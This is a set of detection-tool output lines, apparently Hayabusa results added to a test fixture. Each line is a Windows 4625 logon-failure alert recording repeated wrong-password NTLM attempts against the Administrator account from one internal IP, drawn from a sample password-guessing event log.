+2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TzaZe6Y4Tdfjseuk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FEmbuU3CAC3CecZy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kfBmqmVPd0CGVUsD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Uz3TlU6yrcveM1w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z6hH6AkkgBFmeZ6u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J2J1W2WhA6Pj7j5j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: soHOxnkoOn7ot0My  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4c2oWI6mRIvSVSKq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FKsXD8aTyaC4fBqq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qrzji5ucmutsZNpo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BApOU105FCLwj4zn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EO50f7NfrrdwwCNA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PfTYbWC8IjW87th8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wLnE6zm5US4maK04  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5AV7taC7hYQdVjAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8MnnaSRs0bnYVlMX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YgqavZ1SuNvX7RgH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IQvoIsfW0LhDit2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 33IPGQXc1MarY30J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: II4Ly9LnkWlq60Ux  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wncfJC7kDSI7O9Ud  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6XzbWef3PuzQK3FJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5M5670HdNC6c8O56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ea8FcddgLyV5o6oL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LjyhmKFdBNrHIvTJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PIF47pEWBMp6Nbym  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6TO891WvJPkdjsct  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6cLnJYpHEzGAvhWG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gy6cFTrwrpRQFxfQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gxz612Z88PMCKzAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GSPC8hibdZdyOcex  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6vlmykLeFmuhn81B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4w4lEW9w53zMFPcc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jt2lDRFWwi6adwlB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G9MGvle35u5OGB5o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJgLFM2vrnKuj5N3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8HRyDAzwKj9bfnA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J65LcwnRgEob9wjY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yhas9e1fwDZ1Fxvt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5qJRSpjS6tZJjNQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bo4HAgP2tw0GmZ4o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zv0cbLCD7E05i0g5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FIKsQLk5iPyKoeqM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RiHAaBszJBGe2deQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8em4eOiqze683Cj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86lXQsnn7dae93tW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Iu8olNGPmhxh6iNu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qZYtN5EMHxcNqID6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mtUQGxrMoPkpUQCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QYh4e3bpePhDoRwr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UkC8E9uKpCgD1BHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ZCDxpmDZbpGCey3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SS2dxS3WvCrAyiB2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YT3VHxKNf8q14rro  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fx9HQT3u3Ig6vJ3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FukPQsr4SXRshyTn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7AutKUyPELNRUcA4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 38gBkWcYdZW6Wcdz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HMKnLRQCDn1CHZdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ShGnRYHfVSuPvfcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LXVWG3Yl0utv98Zf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VDfa0UebgleQMK5U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxTLJJsWs9dOc5JC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x7cKtymmsQJSM6zZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbtC0srNyvkIHOSV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wPGlJ6ZjGSfUKrCf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Uw95Ema8vWlRXKy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hHTrBmhkjGLTNt2R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJeRVGKULJIo76aa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Kipf0Z2Tse2eWoxa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bnP7tmMJXDVzIDim  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CBeMt62oqlIICShT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
